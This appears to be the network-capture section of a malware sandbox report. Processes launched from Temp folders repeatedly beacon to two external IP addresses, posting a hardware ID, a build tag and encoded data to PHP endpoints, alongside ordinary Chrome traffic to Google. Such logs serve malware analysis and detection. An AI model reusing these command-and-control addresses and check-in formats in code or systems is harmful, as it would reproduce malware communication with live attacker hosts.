Nov 12, 2024 00:08:00.832433939 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:08:01.579499960 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:08:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50323	185.215.113.206	80	9108	C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:08:01.484704971 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:08:02.122514963 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:08:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:08:02.125642061 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"mars------DGHIDAFCGIEHIEBFCFBA--
Nov 12, 2024 00:08:02.327503920 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:08:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50325	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:08:03.477346897 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 12, 2024 00:08:04.122051001 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:08:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50326	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:08:05.750507116 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:08:06.395488024 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:08:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	50327	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:08:09.701973915 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:08:10.346910000 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:08:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:08:10.348962069 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHD Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="build"mars------AKKEGHJDHDAFHIDHCFHD--
Nov 12, 2024 00:08:10.551120043 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:08:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	142.250.185.196	443	5944	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:09 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 23:06:09 UTC	1266	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:09 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-wTONUxMGVCCYd42bhDeU_w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 23:06:09 UTC	112	IN	Data Raw: 33 30 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 65 6d 70 68 69 73 20 66 6f 6f 74 62 61 6c 6c 20 6b 61 72 6d 65 6c 6f 20 6f 76 65 72 74 6f 6e 22 2c 22 64 65 61 64 70 6f 6f 6c 20 77 6f 6c 76 65 72 69 6e 65 20 64 69 73 6e 65 79 20 70 6c 75 73 22 2c 22 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 66 6f 72 65 63 61 73 74 22 2c 22 73 Data Ascii: 30d)]}'["",["memphis football karmelo overton","deadpool wolverine disney plus","aurora borealis forecast","s
2024-11-11 23:06:09 UTC	676	IN	Data Raw: 68 69 62 61 20 69 6e 75 20 63 72 79 70 74 6f 22 2c 22 63 75 62 61 20 65 61 72 74 68 71 75 61 6b 65 73 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 65 6d 75 6c 61 74 6f 72 22 2c 22 67 65 6e 65 72 61 6c 20 68 6f 73 70 69 74 61 6c 20 73 70 6f 69 6c 65 72 73 22 2c 22 62 72 79 63 65 20 75 6e 64 65 72 77 6f 6f 64 20 63 6f 6e 6e 6f 72 20 73 74 61 6c 69 6f 6e 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f Data Ascii: hiba inu crypto","cuba earthquakes","nintendo switch emulator","general hospital spoilers","bryce underwood connor stalions"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNo
2024-11-11 23:06:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	142.250.185.196	443	5944	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:09 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	142.250.185.196	443	5944	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:09 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 23:06:09 UTC	1042	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 11 Nov 2024 23:06:09 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 23:06:09 UTC	336	IN	Data Raw: 32 36 37 39 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2679)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-11 23:06:09 UTC	1378	IN	Data Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
2024-11-11 23:06:09 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
2024-11-11 23:06:09 UTC	1378	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
2024-11-11 23:06:09 UTC	1378	IN	Data Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
2024-11-11 23:06:09 UTC	1378	IN	Data Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 33 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700323,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_sc
2024-11-11 23:06:09 UTC	1378	IN	Data Raw: 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 53 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 5b 51 64 28 5c 22 64 Data Ascii: erCase()\u003d\u003d\u003da+\":\")};_.Rd\u003dglobalThis.trustedTypes;_.Sd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003d[Qd(\"d
2024-11-11 23:06:09 UTC	1253	IN	Data Raw: 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 Data Ascii: .i;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonc
2024-11-11 23:06:09 UTC	369	IN	Data Raw: 31 36 61 0d 0a 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 Data Ascii: 16a).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return 